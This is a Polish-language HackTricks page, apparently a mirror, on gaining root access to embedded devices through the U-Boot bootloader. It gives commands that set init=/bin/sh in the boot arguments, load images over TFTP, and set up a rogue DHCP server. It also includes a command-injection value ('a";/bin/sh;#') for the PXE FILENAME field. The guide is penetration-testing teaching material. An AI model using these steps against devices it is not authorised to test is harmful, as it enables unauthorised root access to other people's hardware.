mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 13:13:41 +00:00
4.8 KiB
4.8 KiB
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF sprawdź PLAN SUBSKRYPCYJNY!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na GitHubie.
Następujące kroki są zalecane do modyfikowania konfiguracji uruchamiania urządzenia i bootloaderów, takich jak U-boot:
- Dostęp do Interpretera Powłoki Bootloadera:
- Podczas uruchamiania naciśnij "0", spację lub inne zidentyfikowane "magiczne kody", aby uzyskać dostęp do interpretera powłoki bootloadera.
- Modyfikacja Argumentów Uruchomieniowych:
- Wykonaj następujące polecenia, aby dodać '
init=/bin/sh
' do argumentów uruchomieniowych, umożliwiając wykonanie polecenia powłoki: %%% #printenv #setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3 mtdparts=sflash: rootfstype= hasEeprom=0 5srst=0 init=/bin/sh #saveenv #boot %%%
- Skonfiguruj Serwer TFTP:
- Skonfiguruj serwer TFTP do ładowania obrazów przez sieć lokalną: %%% #setenv ipaddr 192.168.2.2 #lokalny adres IP urządzenia #setenv serverip 192.168.2.1 #adres IP serwera TFTP #saveenv #reset #ping 192.168.2.1 #sprawdź dostęp do sieci #tftp ${loadaddr} uImage-3.6.35 #loadaddr to adres, pod którym ma zostać załadowany plik i nazwa pliku obrazu na serwerze TFTP %%%
- Wykorzystaj
ubootwrite.py
:
- Użyj
ubootwrite.py
, aby zapisać obraz U-boot i wgrać zmodyfikowane oprogramowanie w celu uzyskania dostępu root.
- Sprawdź Funkcje Debugowania:
- Zweryfikuj, czy funkcje debugowania, takie jak szczegółowe logowanie, ładowanie dowolnych jąder lub uruchamianie z niezaufanych źródeł, są włączone.
- Ostrożność przy Interferencji Sprzętowej:
- Bądź ostrożny, łącząc jeden pin z masą i interagując z układami SPI lub NAND flash podczas sekwencji uruchamiania urządzenia, szczególnie przed dekompresją jądra. Skonsultuj się z kartą danych układu NAND flash przed zwieraniem pinów.
- Skonfiguruj Podstępny Serwer DHCP:
- Skonfiguruj podstępny serwer DHCP z złośliwymi parametrami, które urządzenie ma zaakceptować podczas uruchamiania przez PXE. Wykorzystaj narzędzia takie jak pomocniczy serwer DHCP Metasploita (MSF). Zmodyfikuj parametr 'FILENAME' za pomocą poleceń wstrzykiwania poleceń, takich jak
'a";/bin/sh;#'
, aby przetestować walidację wejścia dla procedur uruchamiania urządzenia.
Uwaga: Kroki związane z fizycznym oddziaływaniem z pinami urządzenia (*oznaczone gwiazdką) należy podejść z najwyższą ostrożnością, aby uniknąć uszkodzenia urządzenia.
Referencje
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF sprawdź PLAN SUBSKRYPCYJNY!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na GitHubie.